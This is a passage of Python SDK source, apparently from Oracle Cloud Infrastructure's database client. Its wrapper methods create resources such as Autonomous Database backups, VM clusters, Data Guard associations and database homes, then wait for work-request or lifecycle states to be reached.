Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_database_backup`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_database_backup(create_autonomous_database_backup_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_database_backup_and_wait_for_state(self, create_autonomous_database_backup_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_database_backup` and waits for the :py:class:`~oci.database.models.AutonomousDatabaseBackup` acted upon
to enter the given state(s).
:param oci.database.models.CreateAutonomousDatabaseBackupDetails create_autonomous_database_backup_details: (required)
Request to create a new Autonomous Database backup.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabaseBackup.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_database_backup`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_database_backup(create_autonomous_database_backup_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database_backup(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_vm_cluster_and_wait_for_work_request(self, create_autonomous_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateAutonomousVmClusterDetails create_autonomous_vm_cluster_details: (required)
Request to create an Autonomous VM cluster.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_vm_cluster(create_autonomous_vm_cluster_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_autonomous_vm_cluster_and_wait_for_state(self, create_autonomous_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_autonomous_vm_cluster` and waits for the :py:class:`~oci.database.models.AutonomousVmCluster` acted upon
to enter the given state(s).
:param oci.database.models.CreateAutonomousVmClusterDetails create_autonomous_vm_cluster_details: (required)
Request to create an Autonomous VM cluster.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousVmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_autonomous_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_autonomous_vm_cluster(create_autonomous_vm_cluster_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_backup_and_wait_for_work_request(self, create_backup_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_backup` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateBackupDetails create_backup_details: (required)
Request to create a new database backup.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_backup`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_backup(create_backup_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_backup_and_wait_for_state(self, create_backup_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_backup` and waits for the :py:class:`~oci.database.models.Backup` acted upon
to enter the given state(s).
:param oci.database.models.CreateBackupDetails create_backup_details: (required)
Request to create a new database backup.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Backup.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_backup`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_backup(create_backup_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_backup(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_backup_destination_and_wait_for_state(self, create_backup_destination_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_backup_destination` and waits for the :py:class:`~oci.database.models.BackupDestination` acted upon
to enter the given state(s).
:param oci.database.models.CreateBackupDestinationDetails create_backup_destination_details: (required)
Request to create a new backup destination.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.BackupDestination.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_backup_destination`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_backup_destination(create_backup_destination_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_backup_destination(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_cloud_exadata_infrastructure_and_wait_for_work_request(self, create_cloud_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_cloud_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateCloudExadataInfrastructureDetails create_cloud_exadata_infrastructure_details: (required)
Request to create a cloud Exadata infrastructure resource in an `Exadata Cloud Service`__ instance.
__ https://docs.cloud.oracle.com/Content/Database/Concepts/exaoverview.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_cloud_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_cloud_exadata_infrastructure(create_cloud_exadata_infrastructure_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_cloud_exadata_infrastructure_and_wait_for_state(self, create_cloud_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_cloud_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.CloudExadataInfrastructure` acted upon
to enter the given state(s).
:param oci.database.models.CreateCloudExadataInfrastructureDetails create_cloud_exadata_infrastructure_details: (required)
Request to create a cloud Exadata infrastructure resource in an `Exadata Cloud Service`__ instance.
__ https://docs.cloud.oracle.com/Content/Database/Concepts/exaoverview.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.CloudExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_cloud_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_cloud_exadata_infrastructure(create_cloud_exadata_infrastructure_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_cloud_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_cloud_vm_cluster_and_wait_for_work_request(self, create_cloud_vm_cluster_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_cloud_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateCloudVmClusterDetails create_cloud_vm_cluster_details: (required)
Request to create a cloud VM cluster. Applies to Exadata Cloud Service instances only. See `The New Exadata Cloud Service Resource Model`__ for information on this resource type.
__ https://docs.cloud.oracle.com/iaas/Content/Database/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_cloud_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_cloud_vm_cluster(create_cloud_vm_cluster_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_cloud_vm_cluster_and_wait_for_state(self, create_cloud_vm_cluster_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_cloud_vm_cluster` and waits for the :py:class:`~oci.database.models.CloudVmCluster` acted upon
to enter the given state(s).
:param oci.database.models.CreateCloudVmClusterDetails create_cloud_vm_cluster_details: (required)
Request to create a cloud VM cluster. Applies to Exadata Cloud Service instances only. See `The New Exadata Cloud Service Resource Model`__ for information on this resource type.
__ https://docs.cloud.oracle.com/iaas/Content/Database/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.CloudVmCluster.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_cloud_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_cloud_vm_cluster(create_cloud_vm_cluster_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_cloud_vm_cluster(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_console_connection_and_wait_for_state(self, create_console_connection_details, db_node_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_console_connection` and waits for the :py:class:`~oci.database.models.ConsoleConnection` acted upon
to enter the given state(s).
:param oci.database.models.CreateConsoleConnectionDetails create_console_connection_details: (required)
Request object for creating an CreateConsoleConnection
:param str db_node_id: (required)
The database node `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.ConsoleConnection.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_console_connection`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_console_connection(create_console_connection_details, db_node_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_console_connection(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_data_guard_association_and_wait_for_work_request(self, database_id, create_data_guard_association_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_data_guard_association` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.CreateDataGuardAssociationDetails create_data_guard_association_details: (required)
A request to create a Data Guard association.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_data_guard_association(database_id, create_data_guard_association_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_data_guard_association_and_wait_for_state(self, database_id, create_data_guard_association_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_data_guard_association` and waits for the :py:class:`~oci.database.models.DataGuardAssociation` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.CreateDataGuardAssociationDetails create_data_guard_association_details: (required)
A request to create a Data Guard association.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DataGuardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_data_guard_association(database_id, create_data_guard_association_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_guard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_database_and_wait_for_work_request(self, create_new_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateDatabaseBase create_new_database_details: (required)
Request to create a new database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_database(create_new_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_database_and_wait_for_state(self, create_new_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_database` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param oci.database.models.CreateDatabaseBase create_new_database_details: (required)
Request to create a new database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_database(create_new_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_database_software_image_and_wait_for_work_request(self, create_database_software_image_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_database_software_image` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateDatabaseSoftwareImageDetails create_database_software_image_details: (required)
Request to create database software image.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_database_software_image`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_database_software_image(create_database_software_image_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_database_software_image_and_wait_for_state(self, create_database_software_image_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_database_software_image` and waits for the :py:class:`~oci.database.models.DatabaseSoftwareImage` acted upon
to enter the given state(s).
:param oci.database.models.CreateDatabaseSoftwareImageDetails create_database_software_image_details: (required)
Request to create database software image.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DatabaseSoftwareImage.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_database_software_image`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_database_software_image(create_database_software_image_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database_software_image(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_db_home_and_wait_for_work_request(self, create_db_home_with_db_system_id_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_db_home` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.CreateDbHomeBase create_db_home_with_db_system_id_details: (required)
Request to create a new Database Home.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_db_home`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.create_db_home(create_db_home_with_db_system_id_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def create_db_home_and_wait_for_state(self, create_db_home_with_db_system_id_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.create_db_home` and waits for the :py:class:`~oci.database.models.DbHome` acted upon
to enter the given state(s).
:param oci.database.models.CreateDbHomeBase create_db_home_with_db_system_id_details: (required)
Request to create a new Database Home.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DbHome.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.create_db_home`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
